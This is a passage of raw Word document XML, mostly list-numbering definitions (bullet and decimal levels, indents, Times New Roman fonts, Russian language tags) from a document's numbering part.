        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-20"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCDC9630">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="363E4A46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F3720E5C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3CD28DAC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C5C761A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2D3CA3AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C686B7D2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="74F67AD2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="115" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A3F120A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C789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B1B22A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F94BFA2"/>
    <w:lvl w:ilvl="0" w:tplc="3410AF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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4BE67F9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F8C29AE"/>
    <w:lvl w:ilvl="0" w:tplc="446EA5F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="-30"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9E7A562A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DCC628F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DA5ED1C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CEB2FC3A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D7E6158E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3B8232F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="76C4CF5C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="ACACF258">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="118" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4DEE6387"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="068EDD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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4F8B5BEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05A61858"/>
    <w:lvl w:ilvl="0" w:tplc="7F729CE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0CB4D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1326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0FD38A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAC48574"/>
    <w:lvl w:ilvl="0" w:tplc="2EA02616">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1253" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9BCC6D72">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2238" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="29D0818E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3217" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8788F328">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4195" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D87CCF1A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5174" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B8CE4C44">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6152" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5F547AB2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7131" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A28EC18A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8109" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6674EF24">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9088" w:hanging="179"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="122" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="55915580"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3E62D78"/>
    <w:lvl w:ilvl="0" w:tplc="C13E05EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="-10"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2AB601F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2CE49F7A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8C3E8878">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D9845A90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C220DE06">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4FD89A70">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3ABA798A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3EFE2234">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="123" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="588355A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D305FA2"/>
    <w:lvl w:ilvl="0" w:tplc="8A06949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58EF230B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="462C9A88"/>
    <w:lvl w:ilvl="0" w:tplc="E73C8450">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="173" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="29"/>
        <w:szCs w:val="29"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="78EA18F8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="617" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3E441F72">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B0EA9BC8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1493" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E0C6A86C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1930" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D0AAA818">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2368" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="20BE699E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2806" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="73D64652">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3243" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0DBEA004">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3681" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="125" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5959663D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C3088BE"/>
    <w:lvl w:ilvl="0" w:tplc="DE422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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A900701"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C530529A"/>
    <w:lvl w:ilvl="0" w:tplc="E34090D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1506"/>
        </w:tabs>
        <w:ind w:left="150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C2C527A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D28E33E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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D8741DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="576E7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FB73872"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="571E8182"/>
    <w:lvl w:ilvl="0" w:tplc="E34090D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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="606427CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4A804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62D11DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F73ECA50"/>
    <w:lvl w:ilvl="0" w:tplc="0E565A36">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="160" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5CA004AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1248" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CEB48EC0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2337" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C8480F2C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3425" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="872652D4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4514" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="19D09830">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5602" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="10328A9A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6691" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DE90D0A6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7779" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="14627C76">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8868" w:hanging="310"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="132" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="672B2484"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3352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83D40E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7534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A6A2BB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BCAC7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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A8B2A08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D1649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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B125DA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F048867A"/>
    <w:lvl w:ilvl="0" w:tplc="3BEC24C6">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6C1705DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E84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CEF508A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F2FC772A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="269"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="139" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6D4D71A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77F0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DB57747"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14AA164A"/>
    <w:lvl w:ilvl="0" w:tplc="3EDE58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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E063972"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A0C7B80"/>
    <w:lvl w:ilvl="0" w:tplc="081C5426">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="660"/>
        </w:tabs>
        <w:ind w:left="660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7D3A8E8C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1725" w:hanging="705"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:r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42" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EA03C2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9ED244CE"/>
    <w:lvl w:ilvl="0" w:tplc="391097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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70BB7BA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCDA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14D62F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="122C802A"/>
    <w:lvl w:ilvl="0" w:tplc="138E992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26B3F70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF301A86"/>
    <w:lvl w:ilvl="0" w:tplc="DCC89F7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1191"/>
        </w:tabs>
        <w:ind w:left="1191" w:hanging="7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39B64F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6330A4F6"/>
    <w:lvl w:ilvl="0" w:tplc="D3EA52CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1170"/>
        </w:tabs>
        <w:ind w:left="1170" w:hanging="4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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="744018F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
